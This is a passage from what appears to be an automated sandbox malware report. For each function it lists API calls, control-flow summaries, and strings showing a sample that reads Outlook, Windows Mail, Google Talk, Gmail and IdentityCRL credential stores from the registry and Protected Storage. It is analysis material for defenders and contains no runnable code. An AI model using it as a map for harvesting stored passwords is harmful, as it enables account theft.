                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C37
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403E41
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C73
                                                                                                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403C91
                                                                                                                                                                                          • pstorec.dll, xrefs: 00403C1D
                                                                                                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C87
                                                                                                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D28
                                                                                                                                                                                          • PStoreCreateInstance, xrefs: 00403C31
                                                                                                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C7D
                                                                                                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D5B
                                                                                                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403D91
                                                                                                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CC3
                                                                                                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D2F
                                                                                                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CE8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                          • API String ID: 1197458902-317895162
                                                                                                                                                                                          • Opcode ID: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                          • Instruction ID: 8c3092e028ed30b7bcb0bf0438431f6e947b4810b401e401bf51def59c6c6aaf
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bc8121a93fa9ff4bc87b9f29a8f644e5a8c2d28e7501eaeea369390cda5a4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51A571600615B6E714AF71CD86FEAB76CAF00709F20053FF904B61C2DBBDBA5486A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F478 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 231 40f478-40f4ad call 4446d0 RegOpenKeyExA 234 40f4b3-40f4c7 RegOpenKeyExA 231->234 235 40f5af-40f5b5 231->235 236 40f5a5-40f5a9 RegCloseKey 234->236 237 40f4cd-40f4f6 RegQueryValueExA 234->237 236->235 238 40f59b-40f59f RegCloseKey 237->238 239 40f4fc-40f50b call 40472f 237->239 238->236 239->238 242 40f511-40f549 call 4047a0 239->242 242->238 245 40f54b-40f553 242->245 246 40f591-40f595 LocalFree 245->246 247 40f555-40f58c memcpy * 2 call 40f177 245->247 246->238 247->246
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4A9
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E6C,?), ref: 0040F4C3
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E6C,?), ref: 0040F4EE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E6C,?), ref: 0040F59F
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F55C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F571
                                                                                                                                                                                            • Part of subcall function 0040F177: RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                            • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                            • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                            • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                          • API String ID: 2768085393-888555734
                                                                                                                                                                                          • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                          • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044412E Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3662548030-0
                                                                                                                                                                                          • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                          • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004437D7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                            • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                            • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                            • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                            • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                          • memset.MSVCRT ref: 00443866
                                                                                                                                                                                          • memset.MSVCRT ref: 00443881
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                          • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                          • Store Root, xrefs: 00443892
                                                                                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                          • API String ID: 832325562-2578778931
                                                                                                                                                                                          • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                          • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                                                          • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                          • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040EDD5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 329 40efdf-40efea call 404780 318->329 330 40ef8f-40efb3 call 4047a0 318->330 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 328 40f036-40f044 322->328 328->315 329->320 330->329 335 40efb5-40efb8 330->335 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->329 337->336
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                            • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2012582556-3916222277
                                                                                                                                                                                          • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                          • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004037BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                          • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                            • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                            • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                          • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                          • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                          • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                                                                                          • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                          • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004034D6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                          • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                          • API String ID: 3071782539-966475738
                                                                                                                                                                                          • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                          • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C9F7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2054149589-0
                                                                                                                                                                                          • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                          • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                                                                                                                                                                          • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                          • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408344 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                            • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                            • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                            • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          • memset.MSVCRT ref: 00408392
                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                          • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                          • API String ID: 2959138223-1079885057
                                                                                                                                                                                          • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                          • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                                                          • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B783 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 403 40b783-40b795 404 40b7e2-40b7f6 call 406a00 403->404 405 40b797-40b7ad call 407baf _mbsicmp 403->405 427 40b7f8 call 410411 404->427 428 40b7f8 call 404780 404->428 429 40b7f8 call 403c03 404->429 430 40b7f8 call 410166 404->430 431 40b7f8 call 40472f 404->431 410 40b7d6-40b7e0 405->410 411 40b7af-40b7c8 call 407baf 405->411 410->404 410->405 417 40b7ca-40b7cd 411->417 418 40b7cf 411->418 412 40b7fb-40b80e call 407bbf 419 40b810-40b81c 412->419 420 40b855-40b864 SetCursor 412->420 421 40b7d0-40b7d1 call 40b340 417->421 418->421 422 40b833-40b852 qsort 419->422 423 40b81e-40b829 419->423 421->410 422->420 423->422 427->412 428->412 429->412 430->412 431->412
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                                                                                          • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                          • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041072B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 457 41074f-410752 448->457 458 41075e-410761 448->458 451 410797-4107a5 449->451 452 41078d-410790 449->452 453 4107b5-4107bf call 410411 451->453 452->451 455 410792-410795 452->455 462 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 453->462 463 4107ef-410802 _mbscpy 453->463 455->451 459 4107a7-4107b0 455->459 457->449 461 410754-410757 457->461 465 410768 458->465 459->453 461->449 464 410759-41075c 461->464 462->463 467 410805-410807 463->467 464->449 464->458 465->467
                                                                                                                                                                                          APIs
